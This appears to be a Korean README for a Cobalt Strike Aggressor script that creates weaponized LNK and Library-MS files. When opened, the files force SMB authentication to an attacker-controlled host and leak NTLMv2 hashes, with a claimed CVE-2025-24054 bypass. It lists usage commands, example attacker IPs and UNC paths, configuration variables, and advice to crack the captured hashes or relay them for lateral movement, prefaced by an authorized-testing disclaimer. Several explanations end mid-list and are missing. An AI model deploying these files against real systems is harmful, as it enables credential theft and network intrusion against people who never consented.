
승인된 레드 팀 운영을 위해 SMB NTLMv2 해시 노출을 트리거하는 LNK 및 Library-MS 파일을 무기화하는 Cobalt Strike Aggressor 스크립트로, CVE-2025-24054 우회를 포함합니다.
SMB NTLMv2-SSP 해시 공개를 위해 악성 LNK 파일 및 Library-MS 파일을 무기화하고 실행하는 포괄적인 Cobalt Strike Aggressor 스크립트입니다. CVE-2025-24054 우회 기술을 포함합니다.
이 도구는 교육 및 연구 목적으로만 제공됩니다. 작성자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다. 소유하거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
이 스크립트는 열릴 때 운영자의 호스트로 SMB 인증을 트리거하는 무기화된 .lnk 및 .library-ms 파일을 생성합니다.
유출된 NTLMv2 해시는 Cobalt Strike에 표시되지 않으며, 공격자 시스템에서 실행 중인 Responder, Impacket의 ntlmrelayx.py 또는 Inveigh와 같은 외부 도구로 캡처해야 합니다.
수집된 해시는 Hashcat으로 크래킹하거나 추가 수평 이동을 위해 릴레이할 수 있습니다.
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # 메인 Aggressor 스크립트 (v2.0)
├── standalone_lnk_weaponizer.ps1 # 독립 실행형 PowerShell 버전
├── README.md # 이 문서
├── INSTALL.md # 설치 및 설정 가이드
└── examples/
├── usage_scenarios.md # 실용적인 사용 예제
└── sample_targets.csv # 샘플 배치 작업 파일
lnk_weaponizer.cna를 Cobalt Strike Aggressor 스크립트 디렉터리에 복사합니다.Cobalt Strike → Script Manager로 이동Load를 클릭하고 lnk_weaponizer.cna 선택Cobalt Strike에서 비콘을 우클릭하여 다음에 접근합니다:
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>
# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>
# Example
library_create C:\Temp 10.10.14.22 share
# Use default settings
lnk_quick
library_quick
# Show help
lnk_help
스크립트는 다음 구성 가능한 기본값을 사용합니다:
192.168.1.10shareC:\Templnk_weaponizer.cna에서 전역 변수를 편집합니다:
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
.library-ms 파일을 생성합니다두 기술 모두 다음을 수행하는 파일을 생성합니다:
스크립트는 상세한 로깅을 제공합니다:
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash
비콘을 찾을 수 없음
권한 거부
PowerShell 실행 정책
bpowershell()을 사용하여 제한 사항을 처리합니다스크립트를 수정하여 상세 출력을 활성화합니다:
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share
# Use default settings for rapid deployment
lnk_quick
library_quick
Library-MS 기술은 다음과 같은 방법으로 CVE-2025-24054 우회를 구현합니다:
이 프로젝트는 교육 목적으로 있는 그대로 제공됩니다. 해당 법률 및 규정에 따라 책임감 있게 사용하십시오.
기억하세요: 모든 시스템에서 테스트하기 전에 항상 적절한 권한을 얻으십시오.